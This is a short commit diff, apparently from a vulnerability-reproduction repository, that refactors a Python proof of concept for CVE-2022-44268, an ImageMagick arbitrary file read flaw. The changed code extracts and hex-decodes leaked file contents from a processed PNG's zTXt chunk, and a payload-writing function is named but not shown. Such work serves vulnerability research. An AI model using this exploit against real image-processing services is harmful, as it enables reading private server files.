improve CVE-2022-44268 POC

Xxpaike · Feb 4, 2023 · c96c062 · c96c062
1 parent d95247c
commit c96c062
Showing 1 changed file with 8 additions and 5 deletions.
diff --git a/imagemagick/CVE-2022-44268/poc.py b/imagemagick/CVE-2022-44268/poc.py
@@ -15,24 +15,27 @@
        b'\xccb\x8cf\x06`gwgf\x11afw\x7fx\x01^K+F'
 
 
-def parse_data(data: bytes):
+def parse_data(data: bytes) -> str:
     _, data = data.strip().split(b'\n', 1)
-    data = binascii.unhexlify(data.replace(b'\n', b'')).decode()
-    sys.stdout.write(data)
-    sys.stdout.flush()
+    return binascii.unhexlify(data.replace(b'\n', b'')).decode()
 
 
 def read(filename: str):
     if not filename:
         logging.error('you must specify a input filename')
         return
 
+    res = ''
     p = png.Reader(filename=filename)
     for k, v in p.chunks():
         logging.info("chunk %s found, value = %r", k.decode(), v)
         if k == b'zTXt':
             name, data = v.split(b'\x00', 1)
-            return parse_data(d.decompress(data[1:]))
+            res = parse_data(d.decompress(data[1:]))
+
+    if res:
+        sys.stdout.write(res)
+        sys.stdout.flush()
 
 
 def write(from_filename, to_filename, read_filename):